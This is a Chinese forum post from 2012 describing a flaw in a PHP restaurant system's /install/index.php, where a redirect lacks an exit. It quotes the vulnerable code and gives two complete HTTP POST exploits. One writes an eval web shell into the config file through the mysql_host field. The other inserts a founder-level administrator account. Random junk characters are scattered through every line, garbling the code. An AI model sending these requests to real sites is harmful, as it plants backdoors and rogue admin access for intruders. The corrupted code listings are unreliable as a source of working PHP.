问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。8 F1 Y: z9 H/ ^2 P
" L( ^$ j8 r7 _* a6 W9 {. M<?php7 B5 E! P- K" Q2 I: I
if(file_exists("../install.lock")) c. {6 Q5 V/ @+ R" y1 V! U* I
{
( U7 W8 u" f+ h7 i. d# q2 k header("Location: ../");//没有退出
; |' U" A ~6 @' \6 [+ f}
$ V6 U1 F z0 y6 ^. j
, l( a) b! f3 E! D ^//echo 'tst';exit;, @& ^: l* ]" p" L
require_once("init.php");
4 G( _; w3 P! m- r! V9 `. kif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
0 k0 i6 F$ Z- d+ ^0 A2 K% v2 v$ D{
7 R% [9 q1 }" Q可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
2 N$ `! G6 ^7 s+ C- S, Y: D/ ~
& S2 @& n, g, b! ?6 `& S1、getshell(很危险)
1 q- E7 Q8 F& T* H& W1 M% W. Iif(empty($_REQUEST['step']) || $_REQUEST['step']==1)$ k u# _8 T5 t
{
' }, j0 P0 U* Z8 |& T* p- s1 @$smarty->assign("step",1);
1 k/ O8 ]- Q5 o3 [$smarty->display("index.html");
* N7 W3 T6 x" j. g# _}elseif($_REQUEST['step']==2)3 A" _( ?; b# n v
{4 G3 q( K. j6 L/ y' K+ |! u: a }
$mysql_host=trim($_POST['mysql_host']);
$ Y/ {: Z) |5 v. G) V* e1 B $mysql_user=trim($_POST['mysql_user']);( o3 D% Y# o p
$mysql_pwd=trim($_POST['mysql_pwd']);
0 Q, D' s# X# l3 v2 C $mysql_db=trim($_POST['mysql_db']);, v& M K+ S7 T3 M: F- z+ x+ ]
$tblpre=trim($_POST['tblpre']);
6 g9 M( S8 x \% u$ b9 V $domain==trim($_POST['domain']);& C M( A- J) w1 u3 W
$str="<?php \r\n";- D# \- Q6 f# W
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
& f* C$ B- s. B5 g3 C $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";- ?4 K- P& f# a0 Q
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";8 {4 ]% V0 c$ Z" {4 O- f+ v) L t" w9 E7 X
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
. q9 c. z) `- Z# ` $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
$ P- h- B" h. n, |* n9 B! e/ ~ $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";7 s8 Y% [/ O6 k' G" |+ A4 y
$str.='define("DOMAIN","'.$domain.'");'."\r\n";$ \( c P! U$ Y
$str.='define("SKINS","default");'."\r\n";
2 b1 K0 I& v( v L/ E $str.='?>';8 K; D, ^8 `+ l
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
- x8 ?% Y& u1 A上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
$ S4 r1 p- p! s. f: E% A! ?POST /canting/install/index.php?m=index&step=2 HTTP/1.1
8 S1 E) c+ W- a1 v1 h- k8 oHost: 192.168.80.1292 q! z5 g5 O' L# \) r
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0: L+ I e$ U2 v5 B3 ?% D# \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
1 G# P4 i+ |( r9 q. n( N& aAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3- D2 i Q3 F3 D6 m4 `/ }+ h; t- A
Accept-Encoding: gzip, deflate. t8 ?( \! K1 e. u( J
Referer: http://192.168.80.129/canting/install/index.php?step=1
) E3 V" A$ D7 T# p9 q+ LCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42- w+ t, l8 o1 Z! j) b6 d$ _/ w
Content-Type: application/x-www-form-urlencoded
+ A# C4 n3 p$ `, v/ B; H( VContent-Length: 126
( `: z0 i+ |/ L3 E# r 8 |' A9 ]/ b# V
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
1 q/ Y9 S7 I; A' G; W但是这个方法很危险,将导致网站无法运行。
]7 y7 d" A( X( _- b
6 D5 j; i" j' ~6 U5 {- P9 u2、直接添加管理员
+ B9 d( F% R8 [3 N% B+ d; M# M" m; N. g& ^ G! w/ f- Z
elseif($_REQUEST['step']==5)
E( e9 s5 Q7 X3 \4 v6 Z: ~# B9 x3 ]{: h7 b6 x" i& g- L
if($_POST)# z6 u/ r9 z- N. r
{ require_once("../config/config.inc.php");+ v4 g: o# O( ~) d1 m
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);! C. r) U/ ]# D9 O
mysql_select_db(MYSQL_DB,$link);
! S4 c$ N& |+ u# \ F mysql_query("SET NAMES ".MYSQL_CHARSET );* s, }4 n ^ A: Q+ N& I
mysql_query("SET sql_mode=''");
: ^# g" \9 u$ c% x+ W
. _. n3 Q' @1 r& @1 t; Q $adminname=trim($_POST['adminname']);
- E% {0 i* P: d" i( c$ h $pwd1=trim($_POST['pwd1']);
0 [% y( d; G4 o6 Q5 e5 X2 [ $pwd2=trim($_POST['pwd2']);
( k& j. G2 g, a; m5 a9 t w if(empty($adminname))7 M4 n, a3 Y1 @ M/ g
{
- ^2 h% X* e* v1 [+ q8 k2 S% K5 y" a6 U# e# C, ^
echo "<script>alert('管理员不能为空');history.go(-1);</script>";8 o) g8 o# |: a1 }1 Z% ?
exit();* E P$ O1 \0 ]9 |* v" H9 v; H
}" U2 V! c H, p
if(($pwd1!=$pwd2) or empty($pwd1))
" h P! ]* m. U$ j {- R, }7 [9 J5 _8 y+ H2 L. ^$ | S
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
. H- f% j1 \, S4 L o; ` R% ?3 B4 n }: O0 U6 m" O) r0 w
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
- ~6 `$ h" D* |3 X0 i9 o }$ V$ R1 L+ ~6 Y. |! @) V1 E
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
* X, x+ p# n& \& ?: i* jPOST /canting/install/index.php?m=index&step=5 HTTP/1.1, q) g7 f& p3 q8 `/ b1 d
Host: 192.168.80.1295 w+ R' X) W& b+ N/ A5 y3 ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0* R0 H% C5 `1 p+ k! b M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. \0 Z5 b5 @+ `2 x
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
: m) a; b' U% G) h4 xAccept-Encoding: gzip, deflate; l) N+ W3 }7 _, d: f3 n
Referer: http://www.2cto.com /canting/install/index.php?step=1 k* Z; s. c: C; I+ ~- G$ Y
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42* x; y) P. i# H7 s x3 G$ L
Content-Type: application/x-www-form-urlencoded ~5 \% g" O; g. P
Content-Length: 46! n' k3 l* ^3 o# Z4 e4 B
/ W" a" Y8 `! i( fadminname=qingshen&pwd1=qingshen&pwd2=qingshen
% B& Y4 N8 V6 c. t |
发表于 2012-12-4 11:13:44
收藏
支持
反对